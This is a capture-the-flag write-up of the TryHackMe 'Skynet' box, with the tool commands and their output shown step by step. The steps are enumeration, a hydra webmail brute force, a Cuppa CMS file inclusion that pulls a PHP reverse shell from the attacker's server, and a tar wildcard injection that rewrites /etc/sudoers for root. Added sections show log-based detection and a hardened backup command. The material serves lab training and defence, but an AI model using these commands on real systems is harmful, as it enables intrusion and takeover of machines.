THM: Skynet

Nmap
First we scan for open ports
# nmap -p- -T4 -sV -sC 10.10.40.240 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-19 23:56 GMT
Nmap scan report for 10.10.40.240
Host is up (0.020s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Skynet
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES PIPELINING AUTH-RESP-CODE SASL TOP CAPA UIDL
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: SASL-IR LITERAL+ capabilities more IMAP4rev1 LOGINDISABLEDA0001 IDLE ID ENABLE post-login listed Pre-login OK LOGIN-REFERRALS have
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2025-03-19T23:57:12
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: 1h39m47s, deviation: 2h53m12s, median: -12s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2025-03-19T18:57:12-05:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.91 seconds
Multiple ports found, so we just need to work our way through them methodically
Website
There doesn't appear to be much functionality on the website, so let's run a directory scan
# gobuster dir -u http://10.10.40.240 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.40.240
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/admin (Status: 301) [Size: 312] [--> http://10.10.40.240/admin/]
/.htaccess (Status: 403) [Size: 277]
/config (Status: 301) [Size: 313] [--> http://10.10.40.240/config/]
/css (Status: 301) [Size: 310] [--> http://10.10.40.240/css/]
/index.html (Status: 200) [Size: 523]
/js (Status: 301) [Size: 309] [--> http://10.10.40.240/js/]
/server-status (Status: 403) [Size: 277]
/squirrelmail (Status: 301) [Size: 319] [--> http://10.10.40.240/squirrelmail/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
Nothing in these results is immediately usable, although /squirrelmail (a webmail login) and /admin are worth remembering, so let's check another port
SMB
First let's list any available shares
# smbclient -L 10.10.40.240
Password for [WORKGROUP\root]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP SKYNET
The only share we can connect to without credentials is the anonymous one
smbclient //10.10.40.240/anonymous
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 16:04:00 2020
.. D 0 Tue Sep 17 08:20:17 2019
attention.txt N 163 Wed Sep 18 04:04:59 2019
logs D 0 Wed Sep 18 05:42:16 2019
9204224 blocks of size 1024. 5750160 blocks available
smb: \> cd logs
smb: \logs\> ls
. D 0 Wed Sep 18 05:42:16 2019
.. D 0 Thu Nov 26 16:04:00 2020
log2.txt N 0 Wed Sep 18 05:42:13 2019
log1.txt N 471 Wed Sep 18 05:41:59 2019
log3.txt N 0 Wed Sep 18 05:42:16 2019
9204224 blocks of size 1024. 5750160 blocks available
smb: \logs\>
We download the two non-empty files (log2.txt and log3.txt are 0 bytes). attention.txt has the following message, and log1.txt appears to be a password list
# cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
Brute force login
Using the new information it's time to try logging in to any service we can. With hydra and crackmapexec we test SSH and SMB using milesdyson and the list from log1.txt, but neither works. However we did find a webmail login earlier, so we try that with hydra. The failure string "Unknown" comes from the "Unknown user or password incorrect" message SquirrelMail returns on a bad login, so any response that does not contain it is reported as a hit
# hydra -l milesdyson -P log1.txt 10.10.40.240 http-form-post "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:Unknown"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-20 00:27:30
[DATA] max 16 tasks per 1 server, overall 16 tasks, 31 login tries (l:1/p:31), ~2 tries per task
[DATA] attacking http-post-form://10.10.40.240:80/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:Unknown
[80][http-post-form] host: 10.10.40.240 login: milesdyson password: c*********************r
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-20 00:27:37
With this working login we can get into SquirrelMail, where one of the emails contains another password (the new SMB password for milesdyson)
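The hydra run above is noisy from the defender's side: 31 POSTs to the same login handler from one source in seven seconds, with one success at the end. As an added example (not part of the original write-up), the script below runs that detection over constructed Apache combined-log lines. It assumes a failed SquirrelMail login answers 200 and a successful one 302 (the redirect into webmail), and the IPs, timestamps and sizes are made up.

```sh
#!/bin/sh
# Added example, not part of the original write-up: spot the SquirrelMail password
# spray in Apache access-log lines. Assumptions: combined log format, failed login
# = 200, successful login = 302. Log lines are constructed, not captured.
set -eu

SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT

# Constructed log: 30 failed POSTs then one success from the attacker, one
# failed and one good attempt from a legitimate user, and a plain GET from a third host.
build_sample_log() {
    i=1
    while [ "$i" -le 30 ]; do
        printf '10.11.18.78 - - [20/Mar/2025:00:27:%02d +0000] "POST /squirrelmail/src/redirect.php HTTP/1.0" 200 1543 "-" "Mozilla/5.0 (Hydra)"\n' "$i"
        i=$((i + 1))
    done
    printf '10.11.18.78 - - [20/Mar/2025:00:27:37 +0000] "POST /squirrelmail/src/redirect.php HTTP/1.0" 302 - "-" "Mozilla/5.0 (Hydra)"\n'
    printf '10.10.40.5 - - [20/Mar/2025:00:25:01 +0000] "POST /squirrelmail/src/redirect.php HTTP/1.1" 200 1543 "-" "Mozilla/5.0"\n'
    printf '10.10.40.5 - - [20/Mar/2025:00:25:09 +0000] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0"\n'
    printf '10.10.40.7 - - [20/Mar/2025:00:26:00 +0000] "GET /index.html HTTP/1.1" 200 523 "-" "Mozilla/5.0"\n'
}
build_sample_log > "$SAMPLE_LOG"

# Usage: count_login_posts LOG THRESHOLD
# Prints "ip count" for every source IP with at least THRESHOLD POSTs to the
# SquirrelMail login handler; exit status 1 if nothing crosses the threshold.
# In the combined format $1 is the client IP, $6 is "POST (with the quote),
# $7 the request path and $9 the status code.
count_login_posts() {
    awk -v t="$2" '
        $6 == "\"POST" && $7 ~ /^\/squirrelmail\/src\/redirect\.php/ { n[$1]++ }
        END {
            hit = 0
            for (ip in n) if (n[ip] >= t) { print ip, n[ip]; hit = 1 }
            exit (hit ? 0 : 1)
        }' "$1"
}

# Usage: failures_before_success LOG IP
# Prints how many failed (200) login POSTs IP made before its first 302.
# A long run of failures ending in a success is the signature of a guessed password,
# which is what distinguishes a compromised account from a mere lockout storm.
failures_before_success() {
    awk -v ip="$2" '
        $1 == ip && $6 == "\"POST" && $7 ~ /redirect\.php/ {
            if ($9 == 302 && !won) won = 1
            else if ($9 == 200 && !won) fails++
        }
        END { print fails + 0 }' "$1"
}

count_login_posts "$SAMPLE_LOG" 10           # 10.11.18.78 31
failures_before_success "$SAMPLE_LOG" 10.11.18.78   # 30
```

The threshold is deliberately a parameter: two attempts from 10.10.40.5 is a user mistyping, thirty in seven seconds is a tool. On a real server the same two functions work on the live access log; only the sample-log builder is specific to this example.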
SMB - Authenticated
Using the new creds we can now login to the milesdyson smb share
# smbclient //10.10.40.240/milesdyson -U milesdyson
Password for [WORKGROUP\milesdyson]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 17 10:05:47 2019
.. D 0 Wed Sep 18 04:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 10:05:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 10:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 10:05:14 2019
notes D 0 Tue Sep 17 10:18:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 10:05:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 10:05:14 2019
9204224 blocks of size 1024. 5749996 blocks available
smb: \> cd notes
smb: \notes\> ls
. D 0 Tue Sep 17 10:18:40 2019
.. D 0 Tue Sep 17 10:05:47 2019
3.01 Search.md N 65601 Tue Sep 17 10:01:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 10:01:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 10:01:29 2019
0.00 Cover.md N 3114 Tue Sep 17 10:01:29 2019
1.02 Linear Algebra.md N 70314 Tue Sep 17 10:01:29 2019
important.txt N 117 Tue Sep 17 10:18:39 2019
6.01 pandas.md N 9221 Tue Sep 17 10:01:29 2019
3.00 Artificial Intelligence.md N 33 Tue Sep 17 10:01:29 2019
2.01 Overview.md N 1165 Tue Sep 17 10:01:29 2019
3.02 Planning.md N 71657 Tue Sep 17 10:01:29 2019
1.04 Probability.md N 62712 Tue Sep 17 10:01:29 2019
2.06 Natural Language Processing.md N 82633 Tue Sep 17 10:01:29 2019
2.00 Machine Learning.md N 26 Tue Sep 17 10:01:29 2019
1.03 Calculus.md N 40779 Tue Sep 17 10:01:29 2019
3.03 Reinforcement Learning.md N 25119 Tue Sep 17 10:01:29 2019
1.08 Probabilistic Graphical Models.md N 81655 Tue Sep 17 10:01:29 2019
1.06 Bayesian Statistics.md N 39554 Tue Sep 17 10:01:29 2019
6.00 Appendices.md N 20 Tue Sep 17 10:01:29 2019
1.01 Functions.md N 7627 Tue Sep 17 10:01:29 2019
2.03 Neural Nets.md N 144726 Tue Sep 17 10:01:29 2019
2.04 Model Selection.md N 33383 Tue Sep 17 10:01:29 2019
2.02 Supervised Learning.md N 94287 Tue Sep 17 10:01:29 2019
4.00 Simulation.md N 20 Tue Sep 17 10:01:29 2019
3.05 In Practice.md N 1123 Tue Sep 17 10:01:29 2019
1.07 Graphs.md N 5110 Tue Sep 17 10:01:29 2019
2.07 Unsupervised Learning.md N 21579 Tue Sep 17 10:01:29 2019
2.05 Bayesian Learning.md N 39443 Tue Sep 17 10:01:29 2019
5.03 Anonymization.md N 2516 Tue Sep 17 10:01:29 2019
5.01 Process.md N 5788 Tue Sep 17 10:01:29 2019
1.09 Optimization.md N 25823 Tue Sep 17 10:01:29 2019
1.05 Statistics.md N 64291 Tue Sep 17 10:01:29 2019
5.02 Visualization.md N 940 Tue Sep 17 10:01:29 2019
5.00 In Practice.md N 21 Tue Sep 17 10:01:29 2019
4.02 Nonlinear Dynamics.md N 44601 Tue Sep 17 10:01:29 2019
1.10 Algorithms.md N 28790 Tue Sep 17 10:01:29 2019
3.04 Filtering.md N 13360 Tue Sep 17 10:01:29 2019
1.00 Foundations.md N 22 Tue Sep 17 10:01:29 2019
9204224 blocks of size 1024. 5749996 blocks available
The interesting-looking file is the one called important.txt, so let's download that
# cat important.txt
1. Add features to beta CMS /4**************d
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
Website - CMS
With the newly discovered web directory we can see another page
However this is a fairly blank site, so let's do a directory scan again
# gobuster dir -u http://10.10.40.240/4**************d -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.40.240/4**************d
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/administrator (Status: 301) [Size: 337] [--> http://10.10.40.240/4**************d/administrator/]
/index.html (Status: 200) [Size: 418]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
Checking out the administrator directory gives us a login page for Cuppa CMS
Looking at Exploit-DB (EDB-ID 25971), Cuppa CMS has an unauthenticated file inclusion in administrator/alerts/alertConfigField.php: the urlConfig parameter is passed straight to a PHP include, so pointing it at a URL we control gets our PHP fetched and executed (remote inclusion needs allow_url_include enabled on the target, which it is here). We use the pentest monkey php-reverse-shell with our IP and listener port set, host it with a basic Python web server, and request the vulnerable endpoint with urlConfig pointing at it, which gives us a reverse shell back on our listener
# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.40.240 - - [20/Mar/2025 01:19:08] "GET /shell.php HTTP/1.0" 200 -
# nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.11.18.78] from (UNKNOWN) [10.10.40.240] 50270
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
20:18:55 up 1:24, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ cd /home
$ ls
milesdyson
$ cd milesdyson
$ ls
backups
mail
share
user.txt
$ cat user.txt
7******************************7
Privilege escalation
Checking cron jobs we can see there is a script being run as root every minute
$ cat /etc/cron*
cat: /etc/cron.d: Is a directory
cat: /etc/cron.daily: Is a directory
cat: /etc/cron.hourly: Is a directory
cat: /etc/cron.monthly: Is a directory
cat: /etc/cron.weekly: Is a directory
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
$ cat /home/milesdyson/backups/backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
backup.sh runs tar as root with an unquoted wildcard in /var/www/html, a directory www-data can write to. The shell expands * into file names before tar sees them, and any file name starting with -- is parsed by tar as an option, so we create two files whose names are GNU tar checkpoint options and the next cron run executes our script as root. The script adds www-data to sudoers so we can then just move to root. Note it overwrites /etc/sudoers with > rather than appending, which is fine on a CTF box but would wipe every existing rule on a real system (drop a file in /etc/sudoers.d/ there)
$ cd /var/www/html
$ echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh
$ echo "/var/www/html" > "--checkpoint-action=exec=sh privesc.sh"
$ echo "/var/www/html" > --checkpoint=1
After waiting up to a minute for the next cron run, the sudo rule has appeared
$ sudo -l
User www-data may run the following commands on skynet:
(root) NOPASSWD: ALL
$ sudo su
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
3******************************9
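To see exactly why the two oddly named files work, and what the fix looks like, here is an added example (not code from the original write-up) that reproduces the wildcard injection in a throwaway directory with a harmless payload that only leaves a marker file, next to the same backup command hardened with -- so file names can no longer become options. It needs GNU tar; the directory names and archive path are arbitrary.

```sh
#!/bin/sh
# Added example, not part of the original write-up: tar wildcard injection from
# backup.sh reproduced safely (marker file instead of /etc/sudoers), plus the
# hardened form of the backup command. Requires GNU tar for --checkpoint.
set -eu

# Simulates the cron job: cd into a directory the low-privileged user can write to
# and archive everything with an unquoted glob.
# $1 = web root, $2 = archive path, $3 = "vuln" (as on the box) or "safe"
run_backup_like_cron() {
    cd "$1"
    if [ "$3" = safe ]; then
        # Hardened: '--' ends option parsing, so "--checkpoint=1" is only a file name.
        # Better still, avoid the glob entirely: tar cf "$2" -C "$1" .
        tar cf "$2" -- * 2>/dev/null || true
    else
        tar cf "$2" * 2>/dev/null || true
    fi
}

# Plants the same three files the walkthrough creates, runs the backup in the
# requested mode and prints "executed" if the payload ran, "clean" otherwise.
demo_tar_wildcard() {
    mode=$1
    work=$(mktemp -d)
    mkdir "$work/html"
    echo '<h1>Skynet</h1>' > "$work/html/index.html"
    # The payload the attacker drops; here it only touches a marker file.
    printf '#!/bin/sh\ntouch "%s/pwned"\n' "$work" > "$work/html/privesc.sh"
    # File names that GNU tar parses as options once the shell expands '*'.
    # Created with redirection so nothing interprets the leading dashes as options.
    echo '' > "$work/html/--checkpoint-action=exec=sh privesc.sh"
    echo '' > "$work/html/--checkpoint=1"
    ( run_backup_like_cron "$work/html" "$work/backup.tgz" "$mode" )
    if [ -e "$work/pwned" ]; then result=executed; else result=clean; fi
    rm -rf "$work"
    echo "$result"
}

demo_tar_wildcard vuln   # executed
demo_tar_wildcard safe   # clean
```

With --checkpoint=1 tar fires the checkpoint action after every record, and exec= hands "sh privesc.sh" to /bin/sh with tar's working directory, which is why the script is found by relative path. The same trick applies to any root-run command that globs in a user-writable directory (rsync, chown, 7z and others have their own option-named-file abuses), so the real fix is the -- or -C form plus a directory the low-privileged account cannot write to.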